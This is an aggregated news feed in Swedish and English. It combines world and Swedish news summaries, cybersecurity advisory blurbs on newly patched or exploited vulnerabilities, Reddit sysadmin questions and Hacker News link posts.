Under fredagen släppte Thomas Stenström den officiella VM-låten ”Leva för alltid” – men refrängen är inte nyskriven. Samma textrader kan höras i hans soundtrack till Viaplayserien ”Leva life” som släpptes 2023. – Det är så det fungerar, säger artisten.

A state-aligned hacking group known as FrostyNeighbor has resurfaced with a fresh wave of cyberattacks targeting government organizations in Ukraine, using a carefully designed infection chain that is harder than ever to detect. The group, active since at least 2016, has a long history of targeting countries neighboring Belarus, and its latest campaign shows just […] The post Hackers Abuse Scheduled Tasks to Maintain Persistence in FrostyNeighbor Attacks appeared first on Cyber Security News.

Tydligare gränser, tuffare krav och en starkare rättsstat – det var ämnen i fokus när Kristdemokraternas partiledare Ebba Busch (KD) presenterade en ”handlingsplan mot islamism” vid en pressträff i Karlstad.

Hello, We are deploying a new environment where we got AD tiering in place, T2, T1 and T0. 95% of the users will have their daily work done on the RDS Farm/Collection , so the RDS Session hosts is placed in tier2, we wants the RDS Broker(s) to be placed in Tier1, because its somewhat the "management" of the RDS farm. The issue is that when deploying this collection, the user that is deploy it from the RDS broker needs to be local admin on the RDS SessionHosts, so we need a T1 user be admin on T2 systems, that contradicts the AD tiering policy, where a T1 user should'nt login or be Admin on a t2 system. Anybody got a solution for this? Other than move the RDS broker(s) to T2 submitted by /u/ExamIll635 [link] [comments]

There is a great deal of user-generated content out there, from scripts and software to tutorials and videos, but we've generally tried to keep that off of the front page due to the volume and as a result of community feedback. There's also a great deal of content out there that violates our advertising/promotion rule, from scripts and software to tutorials and videos. We have received a number of requests for exemptions to the rule, and rather than allowing the front page to get consumed, we thought we'd try a weekly thread that allows for that kind of content. We don't have a catchy name for it yet, so please let us know if you have any ideas! In this thread, feel free to show us your pet project, YouTube videos, blog posts, or whatever else you may have and share it with the community. Commercial advertisements, affiliate links, or links that appear to be monetization-grabs will still be removed. submitted by /u/AutoModerator [link] [comments]

Sveriges officiella VM-låt ”Leva för alltid” har släppts och bakom den står Thomas Stenström. Stenström hade hunnit skriva låten innan Sveriges avgörande playoff-match mot Polen, där Sverige kammade hem segern med 3-2. Hör hur ”Leva för alltid” låter och vad Stenström tycker gör en bra VM-låt.

Hello, junior sysadmin here (3rd month into working). So our company has a jump servers so outside vendors would connect to our org inner services using these jump servers. So usually they connect to the server and copy data from hard disks in the jumpserver' file explorer. But now this function for some reason stopped working. I also cannot do it when connecting with admin credentials. When I connect and click onto the hard disk of my host machine the error "\\tsclient is accessible. You might not have permission to use this network resource..." is appearing. At the same time copying using clipboard is working. The rdpclip.exe is also working. Could anyone explain how to solve this problem and even explain on a deeper level what tsclient is responsible for and how to troubleshoot this kind of problem? The other two windows sysadmins are on vacation and this problem was given to me even though I am supposed to work only with linux servers. Thanks everyone for attention. I would really appreciate your help. submitted by /u/Fair-Wolf-9024 [link] [comments]

Malaysian Prime Minister Anwar Ibrahim’s ruling alliance will try to show a united front this weekend, but two former ministers from his own party are threatening to pull attention back to the fractures inside the reformist camp. Pakatan Harapan (PH), the reformist coalition led by Anwar, holds its first convention in four years in the southern state of Johor on Sunday. That same day, former economy minister Rafizi Ramli and former natural resources and environmental sustainability minister Nik...

Sidney Crosby är den störste stjärnan på hela ishockey-VM. I premiären ställs stjärnspäckade guldfavoriten Kanada mot ett ungt och hungrigt Tre Kronor. – Jag har sett dem lite grand på JVM, berättar Crosby.

Four of the Italians were part of a team from the University of Genoa.

Google has rolled out a massive security update for its Chrome browser, sealing a staggering 79 vulnerabilities before threat actors can exploit them. With 14 of these flaws rated as critical, browsing the web on an outdated version leaves your entire system wide open to devastating cyberattacks. The newest stable release bumps Chrome to 148.0.7778.167/168 […] The post 79 Chrome Vulnerabilities Patched, Including 14 Critical One’s – Update Now! appeared first on Cyber Security News.

Microsoft issued an urgent security alert regarding a newly discovered vulnerability in Exchange Server that is currently being exploited in the wild. Tracked as CVE-2026-42897, this critical spoofing flaw carries a high CVSS 3.1 severity score of 8.1 and directly impacts on-premises email infrastructure. Threat actors are actively exploiting this network-based weakness to compromise organizational […] The post Critical Microsoft Exchange Server Vulnerability Actively Exploited in Attacks appeared first on Cyber Security News.

Australia’s trade minister will visit China in an effort to shore up fuel supplies that have run short this year because of bottlenecks in the Strait of Hormuz during the US–Israeli war in Iran. Australian Trade and Tourism Minister Don Farrell told a press conference that he would travel to China to meet Commerce Minister Wang Wentao, after a stop in Japan on Monday. “Very much the topic of the day will be how do we continue to ensure reliable fuel supplies into this country,” Farrell said,...

The refresh resolves critical-severity use-after-free and other types of bugs in various browser components. The post Chrome 148 Update Patches Critical Vulnerabilities appeared first on SecurityWeek.

65 personer har dött och närmare 250 personer uppges vara smittade i ett utbrott av Ebola-virus i nordöstra Kongo-Kinshasa. Den afrikanska unionens smittskyddsmyndighet kallar nu till ett internationellt krismöte.

A high-severity vulnerability in Next.js threatens self-hosted web applications with severe data breaches. Threat actors can now exploit a Server-Side Request Forgery (SSRF) flaw to silently steal cloud credentials, harvest API keys, and access sensitive internal admin panels. Organizations running self-hosted Next.js environments must patch immediately to prevent attackers from pivoting into their internal networks. […] The post Critical Next.js Vulnerability Exposes Cloud Credentials, API keys, and Admin Panels appeared first on Cyber Security News.

Is it possible? Do you know success cases w/o spending 20+k $ on auditors? My customers bombards me with question about certification of my app Perfect Wiki, I need help with finding the best way to show them that my app could be trusted. Comments URL: https://news.ycombinator.com/item?id=48145524 Points: 16 # Comments: 23

En gängtopp från Göteborg som har varit häktad misstänkt för mord och försök till mord i september 2012 i Västra Frölunda avförs från utredningen. – Vi kommer inte längre, säger åklagare Per-Erik Rinsell.

Ryssland uppger att man utsatts för en ukrainska drönarattack under natten, rapporterar Reuters.I staden Rjazan, söder om Moskva, ska tre personer dödats och ett tiotal skadats i en drönarattack, där flervåningshus och en industribyggnad träffades.Dessutom ska ett oljeraffinaderi ha träffats.

The local media should contribute to “telling the ‘good stories of Hong Kong’” amid global turbulence as the city formulates its first five-year blueprint to align with national development, Chief Executive John Lee Ka-chiu has said. Speaking at an annual award ceremony organised by the Newspaper Society of Hong Kong on Friday, Lee said the local media was not only a witness and a recorder of events, but also needed to facilitate and contribute to the city’s and mainland China’s progress. “In...

A man who previously represented residents of fire-ravaged Wang Fuk Court in Tai Po has been arrested, along with his wife, on suspicion of conspiracy to defraud and money laundering, the South China Morning Post has learned. Sources revealed on Friday that Jason Kong Cheung-fat, a director of Ace Interior Design & Engineering Company, and his wife, Rosanna Cheung Yeuk-lan, who is also a director of the firm, were arrested a day earlier. The couple are suspected of borrowing hundreds of...

US President Donald Trump wrapped up his visit to China on Friday, the first by a US leader in nine years. The three-day trip, originally scheduled for March, had been postponed as due to the Iran war. Following Trump’s departure, Russian leader Vladimir Putin will pay a one-day visit on Wednesday, the South China Morning Post reported exclusively. His trip will mark the first time Beijing has hosted the leaders of the two powers in the same month. Pakistan Prime Minister Shehbaz Sharif will...

Hong Kong must evolve beyond acting solely as a “superconnector” and reposition itself as a “super value-adder”, a leading think tank has said, urging the city to strengthen its role in global supply chains and align with national development amid geopolitical and technological shifts. In a 216-page report released on Friday, the 2022 Foundation – founded by Fung Group chairman Victor Fung Kwok-king – outlined a road map for Hong Kong’s next phase of economic growth. It highlighted the need for...

SpaceX has detailed major Starship V3 upgrades ahead of a launch targeted as early as May 19. The changes are meant to move Starship closer to its core goals: rapid reuse, Starlink deployment, orbital refueling, and eventually Moon and Mars missions. Longtime Slashdot reader schwit1 shares a report from Teslarati: Here is an explicit, broken-down list of the key changes, first starting with the changes to Super Heavy V3: - Grid Fin Redesign: Reduced from four fins to three. Each fin is now 50% larger and stronger, repositioned for better catching and lifting performance. Fins are lowered on the booster to reduce heat exposure during hot staging, with hardware moved inside the fuel tank for protection. - Integrated Hot Staging: Eliminates the old disposable interstage shield. The booster dome is now directly exposed to upper-stage engine ignition, protected by tank pressure and steel shielding. Interstage actuators retract after separation. - New Fuel Transfer System: Massive redesign of the fuel transfer tube -- roughly the size of a Falcon 9 first stage -- enables simultaneous startup of all 33 Raptors for faster, more reliable flip maneuvers. - Engine Bay/Thermal Protection: Engine shrouds removed entirely; new shielding added between engines. Propulsion and avionics are more tightly integrated. CO? fire suppression system deleted for a simpler, lighter aft section. - Propellant Loading Improvements: Switched from one quick disconnect to two separate systems for added redundancy and reduced pad complexity. Next, we have the changes to Starship V3: - Completely Redesigned Propulsion System: Clean-sheet redesign supports new Raptor startup, larger propellant volume, and an improved reaction control system while reducing trapped or leaked propellant risk. - Aft Section Simplification: Fluid and electrical systems rerouted; engine shrouds and large aft cavity deleted. - Flap Actuation Upgrade: Changed from two actuators per flap to one actuator with three motors for better redundancy, mass efficiency, and lower cost. - Faster Starlink Deployment: Upgraded PEZ dispenser enables quicker satellite release. - Long-Duration Spaceflight Capability: New systems for long orbital coasts, orbital refueling, cryogenic fluid management, vacuum-insulated header tanks, and high-voltage cryogenic recirculation. - Ship-to-Ship Docking + Refueling: Four docking drogues and dedicated propellant transfer connections added to support in-space refueling architecture. - Avionics Upgrades: 60 custom avionics units with integrated batteries, inverters, and high-voltage systems (9 MW peak power). New multi-sensor navigation for precision autonomous flight. RF sensors measure propellant in microgravity. ~50 onboard camera views and 480 Mbps Starlink connectivity for low-latency communications. "Believe it or not, there's more," writes schwit1. "Two years ago, the biggest and most powerful rocket ever flown was Starship V1. Last year, it was Starship V2. V3 is about to become the biggest and most powerful rocket ever flown -- but don't worry, the company already has plans for V4." Read more of this story at Slashdot.

Mohammadi och Nordqvist klev fram borta mot Högvad Alingsås Tidning

South and Southeast Asian nations may emerge as unexpected clean energy beneficiaries after the Green Party of England and Wales made record-breaking gains in recent UK local council elections, according to analysts. The Greens expanded their footprint in the May 7 council elections, capitalising on widespread voter disillusionment with Britain’s two major parties, Labour and Conservative. It was the party’s best-ever performance in a local election. While Nigel Farage’s right-wing populist...

The US securities regulator had accused the Adanis of paying bribes and misleading investors, which they denied.

Inga stora nyheter har kommit ut efter mötena mellan Donald Trump och Xi Jinping. Men båda länderna verkar utåt sett nöjda med besöket. – Det finns bättre förutsättningar för att kommunicera mellan länderna i framtiden, säger Asienkorrespondent Stefan Åsberg.

No summary in RSS payload. Open original transmission for the full article.

Niklas Jonsson ersätter Anders Byström som landslagschef. Det meddelar Svenska skidförbundet i ett pressmeddelande. ”Jag är både stolt och hedrad”, säger Jonsson.

Lazy weekend of Grand Prix fun turned into a terrifying all-nighter

The zero-day, tracked as CVE-2026-20182, has been exploited in targeted attacks by a sophisticated threat actor identified as UAT-8616. The post Cisco Patches Another SD-WAN Zero-Day, the Sixth Exploited in 2026 appeared first on SecurityWeek.

Before he even entered the race, Andy Burnham was the favourite to unseat Keir Starmer as Britain’s prime minister. The mayor of Greater Manchester led opinion polls and was the front runner among bookmakers and Polymarket. Late Thursday, the biggest obstacle fell away: Labour MP Josh Simons quit the House of Commons, clearing the way for Burnham to win a seat in Parliament, a requirement for the top job. Arriving in London this week as Starmer’s government wobbled, Burnham has kept a low...

För inte så länge sedan debatterade internet hur ofta män egentligen tänker på romarriket. När det kommer till utrikespolitisk debatt hade det nog varit mer relevant med en fråga om antika Grekland.

Microsoft has disclosed a new security vulnerability impacting on-premise versions of Exchange Server that it said has come under active exploitation in the wild. The vulnerability, tracked as CVE-2026-42897 (CVSS score: 8.1), has been described as a spoofing bug stemming from a cross-site scripting flaw. An anonymous researcher has been credited with discovering and reporting the issue. "

Polis och räddningstjänst har ryckt ut på en insats i Gamla stan i Stockholm. Enligt räddningstjänsten handlar det om en ”buss som släpper ut fordonsgas”.

Beijing joins Mars club after ‘nine minutes of ter­ror’ By William Zheng This article was first published on May 16, 2021 After seven months of space travel, three months in orbit and “nine minutes of ter­ror”, China has become the third coun­try in the world to safely land a rover on Mars. The China National Space Admin­is­tra­tion (CNSA) said its rover Zhu Rong – named after the Chinese god of fire and war – suc­cess­fully landed on Mars yes­ter­day after “nine minutes of ter­ror”, refer­ring...

216 kvadratmeter stor villa i Alingsås såld Alingsås Tidning

121 kvadratmeter stort hus i Alingsås köpt för 8 250 000 kronor Alingsås Tidning

Malaysia will not oppose a bid by a fugitive businessman involved in the massive 1MDB corruption scandal to seek a pardon from US President Donald Trump, Prime Minister Anwar Ibrahim said on Friday. Speaking to reporters during a visit to Seremban district, south of Kuala Lumpur, Anwar described the plea by Low Taek Jho as a “non-issue”. The businessman, better known as Jho Low, is formally seeking a “pardon after completion of sentence”, according to the US Department of Justice...

Indiens premiärminister Narendra Modi är på Europaturné och på söndag kommer han till Göteborg. På agendan står bland annat fördjupat ekonomiskt samarbete; för även om Indien är en av världens snabbast växande ekonomier så behöver landet mer utländska investeringar.Trots Indiens snabba tillväxt är klyftorna stora, där bland annat medelklassen fått det allt svårare. Divya Chettri läser tyska och hoppas snart kunna flytta till Tyskland, berättar hon för Sveriges Radios Sydasienkorrespondent.

A Chinese blogger drove 1,300km to take a fellow university student to her hometown to see her dead mother for the last time before her funeral. Both students are in grade four at North Minzu University in Yinchuan of Ningxia Hui Autonomous in northern China. On the evening of May 7, the female student was told that her mother had died suddenly. The reason for the mother’s death was not released, Dahe News reported. Since the female student’s home is located in a mountainous region, she had...

Japan’s quest for rare earth self-sufficiency and its drive to decouple from Chinese supply chains have prompted the government to consider building a dedicated deep-sea mining vessel to recover minerals from the Pacific Ocean floor. Local media reported that the ruling Liberal Democratic Party’s special committee on ocean development will soon present a draft proposal to the Takaichi administration, calling for unspecified project funding. While the initiative will face technological and...

En gaffeltruck har forcerat entrén till en guldbutik i Strömstad under natten. Ägaren uppger att föremål saknas, men vad som har stulits – och var gaffeltrucken kommer från – är i nuläget oklart. – Vi har inledande kontakter med företag som kan veta något om gaffeltrucken, säger Johan Håkansson, polisens presstalesperson.

Just nu pågår Eurovision song contest i Österrikes huvudstad – imorgon är det final. Men i Wien öppnar idag även Wiener Festwochen, en kulturfestival som nu funnits i 75 år.De båda evenemangen kan på ett sätt tyckas vara varandras motsatser – men mycket förenar också.Leonora Scheib, som är dramaturg på Wiener Festwochen, tycker att flerspråkigheten och en önskan om att föra nationer tillsammans förenar.

Manages to get its hands on some Mac Studio machines before the OpenClaw machine grabs them

A 29-year-old Hong Kong man died of misadventure linked to a rare complication following a gastroscopy at a public hospital two years ago, an inquest has found. The Coroner’s Court on Friday ruled that Lui Pak-to died of cerebral oedema, or brain swelling, triggered by the procedure at Queen Mary Hospital in Pok Fu Lam on February 29, 2024. Coroner Raymund Chow Chi-wei cited expert evidence indicating it was undesirable that Lui had to wait four hours and 40 minutes for a brain scan after...

Chinese President Xi Jinping hosted the visiting US leader Donald Trump at Zhongnanhai in the heart of Beijing on Friday, the final day of Trump’s trip. Trees and roses The ancient trees and roses at Zhongnanhai drew Trump’s eye and sparked some light-hearted banter between the two leaders. As they strolled through the Chinese leaders’ compound, Xi pointed out ancient trees, some of them a few hundred years old. “They live that long?” Trump asked, a smiling Xi noting that some of the trees were...

The U.S.Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a newly disclosed vulnerability impacting Cisco Catalyst SD-WAN Controller to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to remediate the issue by May 17, 2026. The vulnerability is a critical authentication bypass tracked as CVE-2026-20182. It's

The papers are dominated by Sir Keir Starmer's fight to stay on as prime minister.

Hi, So I've started blocking htm and html attachments, because they are used in phishing mails and a colleague recently fell into this trap (.js was loaded, looking like a OneDrive page and then it went on from there). But a lot of mails we receive, have mail history and signatures attached as htm files, along side a lot of pretty much empty htm files. This looks to be Apple mail on iOS and maybe MacOS. All mails caught in this Anti-Malware policy, needs to be released by IT, hence IT gets a lot of release requests and the users workflows are interrupted. We aim to release quickly, but this causes some friction. Customer facing support is getting hit hard here, because a lot of customers uses iPhones and the Apple Mail client. But then there is the B2B customers who auto attach htm files, because... I have no clue actually, maybe old ERP systems? How do you all handle this? submitted by /u/SukkerFri [link] [comments]

I södra Finland har invånare nu på morgonen varnats för en potentiellt farlig drönare och boende i landskapet Nyland uppmanades att stanna inomhus.Enligt Försvarsmakten ska jaktplan ha arbetat med att lokalisera farkosten som strax efter klockan 6 ska ha slagit ner eller neutraliserats utan att någon skada skett.Finlands försvarsmakt skriver i ett pressmeddelande att Ukraina i sitt försvar mot Ryssland har gjort omfattande drönarattacker mot Ryssland och att en enstaka drönare kommit in i Finland.

From Ricky Villa to Steven Gerrard, Ray Parlour to Roberto di Matteo - here are 10 of the best FA Cup final goals of all time.

The number of tourist arrivals in Hong Kong grew by 10 per cent year on year in April, bolstered by the city’s annual Sevens rugby tournament. The Tourism Board revealed on Friday that the city welcomed 4.21 million visitors in April, taking the total in the first four months to 18.52 million – a 15 per cent jump from the same period last year. While most visitors recorded in April were from mainland China, the number of tourists from the rest of the world also saw notable growth, rising by 8...

Tensions were already high on Wednesday night in the Philippine Senate, days after lawmakers abruptly ousted its leader and an ex-police chief wanted by the International Criminal Court showed up after six months in hiding. But few could guess at how suddenly terrifying things were going to get. Hours after wanted Senator Ronald dela Rosa had serenaded a group of reporters with the alma mater song of the Philippine Military Academy and declared his right to sanctuary from arrest in the building,...

As the jury deliberates, this is what we found out during the weeks-long trial with two tech titans at its heart.

An industry body survey found hotels in World Cup host cities see the tournament as a "non-event".

"Patriotic" UK anti-immigration social media accounts have been traced to Sri Lanka and Vietnam.

US President Donald Trump said he has secured “fantastic trade deals” during his high-stakes state visit to Beijing, as he met with his counterpart, President Xi Jinping, for a second day in Beijing. “This has been an incredible visit. I think a lot of, a lot of good has come of it. We’ve made some fantastic trade deals, great for both countries,” Trump said on Friday at Zhongnanhai, the Chinese central leadership compound. During the leaders’ meetings, Iran and the reopening of the Strait of...

I'm a Type 1 diabetic and software engineer. Last year I went months between endocrinologists with no clinician reviewing my data. I'm an engineer, so I built the tool I needed — and now I'm open sourcing it. GlycemicGPT is a self-hosted platform that connects continuous glucose monitors, insulin pumps, and existing Nightscout instances to an AI analysis layer running on your own infrastructure. Data sources:Dexcom G7 (cloud API) Tandem t:slim X2 and Mobi pumps (direct BLE) Nightscout (point it at your existing instance and you're running in minutes)What the AI layer does:Daily briefs summarizing overnight and 24-hour patterns Meal response analysis Conversational chat with RAG-backed clinical knowledge Predictive alerting with configurable thresholds and caregiver escalationImportant: this is monitoring and analysis only. GlycemicGPT does not deliver insulin, does not control your pump, and is not a closed-loop system. It reads your data and gives you insight on top of it. Your clinical decisions stay between you and your care team. Architecture:Self-hosted via Docker or K8S — the GlycemicGPT stack runs entirely on your hardware BYOAI — bring your own AI provider. Use Ollama for fully local operation (no data leaves your hardware), or point it at Claude, OpenAI, or any OpenAI-compatible endpoint if you prefer a hosted model. Data flows directly from your instance to the provider you choose; nothing is routed through any centralized service operated by the project. GPL-3.0, no subscriptions, no vendor lock-inStack:Backend API: FastAPI, Python 3.12, PostgreSQL 16, Redis 7 Web Dashboard: Next.js 15, React 19, Tailwind CSS, shadcn/ui AI Sidecar: TypeScript, Express, multi-provider proxy Android App: Kotlin, Jetpack Compose, BLE Wear OS: Kotlin, Wear Compose, Watch Face Push API Plugin SDK: Kotlin interfaces, capability-based, sandboxedLooking for contributors — especially folks with BLE/Android experience or anyone in the diabetes tech space. Plugin SDK is documented if you want to add support for new devices. GitHub: https://github.com/GlycemicGPT/GlycemicGPT Comments URL: https://news.ycombinator.com/item?id=48144670 Points: 4 # Comments: 0

Hong Kong residents can enjoy an 11-day-long holiday over the Easter and Ching Ming holidays in 2027 by applying for only four days of leave, according to the list of official public holidays released by authorities. The Hong Kong government on Friday gazetted the dates for public holidays in 2027, with residents enjoying at least seven long weekends next year. They can take advantage of the Christmas and New Year holidays at the end of 2026 to enjoy a 10-day-long holiday by applying for only...

Det känns som världens längsta och mest offentliga skilsmässa. I slutet av april förhandlade Microsoft och Open AI återigen om den långdragna upplösningen av relationen som pågått mellan de två under de senaste åren. Vid första anblicken ser det ut som en vinn-vinn-situation. I stora drag får Open AI större frihet att styra sin egen kurs – man kan till exempel sälja sina modeller till Microsofts konkurrenter som Amazon och Google – medan Microsoft får ett bättre intäktsavtal och förhandsrätt till de senaste Open AI-teknikerna under det kommande decenniet. Men i själva verket fick det ena företaget ett bättre avtal än det andra. Vem kom ut som vinnare? För att ta reda på det måste vi först titta på de viktigaste detaljerna i det nya avtalet. Ett nytt avtal efter mycket bitterhet Kom ihåg att detta nya avtal inte uppstod ur tomma intet. Det är ett direkt resultat av Microsofts hot i mars om att stämma Open AI när de tecknade ett avtal värt 50 miljarder dollar med Amazon, vilket gör det senare företaget till den enda tredjepartsleverantören av molntjänster för Open AI:s företagsplattform för att bygga och driva AI-agenter. Efter att avtalet mellan Amazon och Open AI undertecknats hävdade Microsoft att det stred mot deras exklusiva molnavtal med Open AI. En källa inom Microsoft sa till Financial Times: ”Vi kan vårt avtal. Vi kommer att stämma dem om de bryter mot det. Om Amazon och Open AI vill satsa på kreativiteten hos sina avtalsjurister skulle jag satsa på oss, inte på dem.” Det ledde till förhandlingar och slutligen till ett avtal mellan Microsoft och Open AI som luckrar upp banden mellan de två företagen, vilket gör det lättare för dem att gå sina egna vägar. Det förändrar också de finansiella relationerna mellan dem avsevärt. Vad Open AI fick Avtalet gav Open AI det som företaget desperat ville ha – en viss grad av oberoende från Microsoft. Den största fördelen för Open AI är att företaget nu kan sälja sina AI-modeller via andra företag än Microsoft, bland annat på Google Cloud och Amazon Web Services. (Hittills har modellerna endast varit tillgängliga på Microsoft Azure.) Med den nya friheten kan Open AI lättare staka ut sin egen kurs istället för att låta Microsoft bestämma den. Open AI får också något avgörande för sin förväntade börsintroduktion – en slutlig gräns för hur mycket pengar man måste betala till Microsoft. Open AI betalar nu 20 procent av sina intäkter till Microsoft. Enligt de nya villkoren kommer Open AI att fortsätta betala fram till 2030, men det totala beloppet för dessa betalningar kommer att begränsas. Företagen har inte avslöjat vad denna gräns är. Taket är avgörande för Open AI, eftersom investerare kommer att vara mer benägna att köpa Open AI-aktier om företagets långsiktiga lönsamhet inte tyngs av betalningar till Microsoft. Vad Microsoft fick Microsoft får också ett bra avtal. Även om Open AI nu kan sälja till Microsofts konkurrenter förblir Microsoft Open AI:s främsta molnpartner; Open AI:s produkter måste levereras på Azure innan de blir tillgängliga hos konkurrenterna. Det ger Microsoft en betydande fördel som ”först på marknaden”, eftersom dess kunder kommer att få Open AI:s senaste produkter före Amazons och Googles kunder. Avtalet förlänger också Microsofts grepp om Open AI:s immateriella rättigheter fram till 2032. Microsoft har satsat stort på sin egen AI-utveckling, så när det exklusiva avtalet löper ut kommer Microsoft sannolikt inte längre att behöva det. Avtalet kommer också att bidra mycket till att öka Microsofts vinst. Företaget behöver inte längre betala royalties till Open AI för återförsäljning av Open AI-produkter på Azure. Istället behåller Microsoft nu alla intäkter själv. Och, som beskrivits ovan, får Microsoft fortfarande 20 procent av Open AI:s intäkter tills taket nås. Det finns en sista dold fördel: Det nya distansförhållandet mellan Microsoft och Open AI gör det mindre troligt att Microsoft skulle kunna åtalas enligt antitrustlagar i USA eller utomlands. Den amerikanska Federal Trade Commission har redan granskat förhållandet flera gånger och utfärdat en varning om potentiella antitrustöverträdelser. FTC:s dåvarande ordförande Lina Khan varnade förra året: ”FTC:s rapport belyser hur partnerskap mellan stora teknikföretag kan skapa inlåsningseffekter, beröva nystartade företag viktiga AI-insatser och avslöja känslig information som kan undergräva rättvis konkurrens.” Så vem är den verkliga vinnaren? Microsoft kommer ut som vinnare. Företaget behöver inte längre betala royalties till Open AI, behåller förstahandsrätt till den senaste Open AI-tekniken, behåller exklusiva rättigheter till AI-företagets immateriella rättigheter fram till 2032 och får 20 procent av Open AI:s intäkter tills ett tak nås. Dessutom är det osannolikt att företaget kommer att utredas för antitrustöverträdelser. Utöver det är det fortfarande en stor aktieägare i Open AI, så det kommer att få del av Open AI:s framgångar. Open AI får visserligen också fördelar – men de är inte alls lika betydande som Microsofts. Det är ännu ett exempel på hur Microsoft har använt sin relation med Open AI för att kickstarta sina egna AI-kapaciteter och säkra sin framtid.

Russian leader Vladimir Putin will pay a one-day visit to Beijing, just days after President Xi Jinping wraps up his closely watched summit with his American counterpart Donald Trump. Sources told the South China Morning Post that the visit was expected to take place later next week, on May 20. They also said the visit was part of Moscow’s routine dealings with Beijing, with little expectation that there would be an elaborate parade or welcome. It will be the first time that China has hosted the...

Article URL: https://claude.com/blog/how-claude-code-works-in-large-codebases-best-practices-and-where-to-start Comments URL: https://news.ycombinator.com/item?id=48144494 Points: 159 # Comments: 114

Article URL: https://dylan.gr/1775146616 Comments URL: https://news.ycombinator.com/item?id=48144490 Points: 43 # Comments: 28

Allows unprivileged users to read files owned by root. Affects all stable kernels as of 2026-05-14. PoC: https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn Patch: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=31e62c2ebbfdc3fe3dbdf5e02c92a9dc67087a3a submitted by /u/Amomynou5 [link] [comments]

Too much bacteria linked to faeces found at almost all England's designated river bathing sites

Under fredagen avslutas mötena i Peking mellan Kinas högsta ledare Xi Jinping och USA:s president Donald Trump.Enligt Trump har Kina lovat att inte skicka militär utrustning till Iran – men mycket är ännu okänt om eventuella överenskommelser mellan ledarna.Trump och Xi håller ett sista möte bakom stängda dörrar på fredagsförmiddagen kinesisk tid i partihögkvarteret Zhongnanhai, innan den amerikanska presidenten flyger hem.

We have selected seven stories from this week’s news across Hong Kong, mainland China, the wider Asia region and beyond that resonated with our readers and shed light on topical issues. If you would like to see more of our reporting, please consider subscribing. 1. The message China wants to send by hosting Trump at Temple of Heaven In Chinese diplomacy, historic venues are rarely just backdrops, and are often interpreted as rich in symbolism, carrying messages about history and bilateral...

No summary in RSS payload. Open original transmission for the full article.

Anyone here have experience with this? Or there any similar services out there? Due to recent price increases in compute market, we couldnt replace the hpc cluster we currently have. The price is too much so we are looking for a solution that wont need immediate capex. Our only strict requirement is thathe hatdware needs to be on-prem? submitted by /u/potatokube [link] [comments]

No summary in RSS payload. Open original transmission for the full article.

I Finland meddelar inrikesdepartementet att drönarvarningen som utfärdades under morgonen nu är över.Under fredagsmorgonen uppmanades invånare i landets södra delar att hålla sig inomhus efter larm om drönare i luftrummet i Nyland, där bland annat Helsingfors ligger.Flygtrafiken stoppades tillfälligt och det finländska luftförsvaret och Natoflyg ska ha patrullerat luftrummet under morgonen.

Two employee devices at OpenAI were compromised in a sweeping software supply chain attack targeting TanStack npm, but the AI company confirmed no user data, production systems, or intellectual property were affected. On May 11, 2026 UTC, threat actors launched a campaign dubbed “Mini Shai-Hulud” a coordinated supply chain offensive orchestrated by the TeamPCP extortion […] The post OpenAI Confirms Security Breach Via TanStack npm Supply Chain Attack appeared first on Cyber Security News.

Article URL: https://github.com/pike00/coldkey Comments URL: https://news.ycombinator.com/item?id=48144410 Points: 17 # Comments: 5

Sedan den ryska invasionen av Ukraina har 306 ukrainska patienter vårdats på svenska sjukhus.Under krigets början kom många cancerpatienter till Sverige, som inte kunde få plats i den ukrainska vården på grund av den ansträngda situationen med många krigsskadade i Ukraina, nu är det framförallt brännskadade som får vård i Sverige.Vid Brännskadecentrum på Akademiska sjukhuset i Uppsala vårdas nu allt fler som drabbats av drönarattacker eller explosioner och fått allvarliga brännskador.

Article URL: https://www.tristandc.com/government/news-2026-05-11-airdrop.php Comments URL: https://news.ycombinator.com/item?id=48144380 Points: 102 # Comments: 19

Samtidigt som CIA-chefen besökte Havanna kom beskedet att USA:s justitiedepartement tänker åtala Kubas expresident Raúl Castro.Den kubanska regeringen meddelade under torsdagen att landets oljereserver är slut och att Kuba kommer ta emot det hjälppaket på 100 miljoner dollar som USA erbjudit. President Miguel Díaz Canel skrev på X att landet är tacksamt, men att det hade varit enklare för USA att lyfta sin blockad mot ön.Trumpadministrationen har de senaste dagarna tonat ner hoten om en militär intervention av Kuba.

Ronda Rousey says she is "smashing the record" alongside Gina Carano for the "most women have been paid in combat sports" and she could become the most powerful figure in MMA since UFC president Dana White.

Andy Burnham, Angela Rayner and Wes Streeting are all potential candidates for the top job.

Från och med idag börjar den nya nationella förordningen mot invasiva arter att gälla. För kommunerna innebär det 34 nya arter som nu måste utrotas – men några extra pengar för att göra jobbet finns inte i nuläget. – Det kommer bli en tuff match, säger Ola Sjösten, gata/parkchef i Tingsryds kommun.

Sedan en månad tillbaka kör timmerbilsföraren Emil Mäki Taavola elektriskt. Han fraktar timmer från skogarna i Luleå till pappersbruket i Karlsborg utanför Kalix. – Det är tyst och skönt, säger han.

Från och med idag införs en ny nationell förordning mot invasiva arter. EU-förteckningen som gällt sedan 2016 har saknat många problemarter i Sverige – något som nu ska ändras.

Allt fler unga går med i scouterna – medlemstalen har ökat i hela landet. I Umeå märks detta av i skogarna. – Scouterna är livet, man känner sig levande, säger Elene Demeestere i Umeå Scoutkår.

Med rätt sorts lek kan du bygga en starkare relation till din hund – på bara några minuter om dagen. Det visar en ny studie från Linköpings universitet.

Sveriges brandmän utbildas för en höjd beredskap. Nya hot har gjort att brandmännens kompetens ska utökas och man tittar bland annat på Rysslands ”double tap”.

Fler än 300 elever i Gårdsten går mot ett sommarlov i total ovisshet. Men i elfte timmen kommer nu ett besked som kan rädda skolan från nedläggning. – Vi har precis skickat in bygglovshandlingar samt fått en avsiktsförklaring av en privat fastighetsägare, berättar vd Emil Mattson för SVT.

